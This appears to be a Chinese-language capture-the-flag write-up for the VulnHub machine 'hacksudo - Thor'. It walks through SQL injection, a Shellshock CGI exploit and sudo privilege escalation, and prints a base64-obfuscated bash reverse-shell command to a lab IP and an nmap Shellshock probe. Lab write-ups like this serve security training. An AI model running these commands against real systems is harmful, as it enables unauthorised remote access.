【vlunhub】hacksudo - Thor

靶机地址:https://www.vulnhub.com/entry/hacksudo-thor,733/

个人测评:

趣味:3星

难度:3星

技巧:2星

信息搜集

bash遍历扫c段

1
for k in $( seq 1 255);do ping -c 1 10.0.2.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

找到我们的目标靶机

或者用arp二层发现

image

用nmap进行全端口扫描

image

80端口是个网站,先尝试从这里突破

image

sql注入

扫出来一个readme,里面泄露了源码地址

https://github.com/zakee94/online-banking-system

到管理员登陆后台,用sql文件里面自带的admin登陆即可

image

发现一个无过滤的注入点

image

同样的,后台有回显的注入

imageimage

先用load_file找到网站路径

image

貌似没有写入权限

那如何getshell呢,这里直接卡住

shellshock

1
2
dirsearch -u url -f -e cgi,sh
看有没有cgi,sh结尾的文件

image

存在破壳漏洞

关于破壳漏洞:https://wooyun.js.org/drops/Shellshock%E6%BC%8F%E6%B4%9E%E5%9B%9E%E9%A1%BE%E4%B8%8E%E5%88%86%E6%9E%90%E6%B5%8B%E8%AF%95.html

image

反弹shell

image

提权

suid,sudo, 系统版本检查

image

www-data可以不用密码就能调用hammer.sh这个脚本

发现能执行命令

image

image

尝试反弹shell,获取thor的权限

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMi80NDQ1IDA+JjE=}|{base64,-d}|{bash,-i}

硬弹成功

image

image

sudo权限

image

一手service sudo提权,谢幕

image

image

这画的是啥。。。

image

是个锤子

补充

nmap扫描

1
nmap -sV -p80 --script http-shellshock uri=/cgi-bin/shell.sh,cmd=ls ip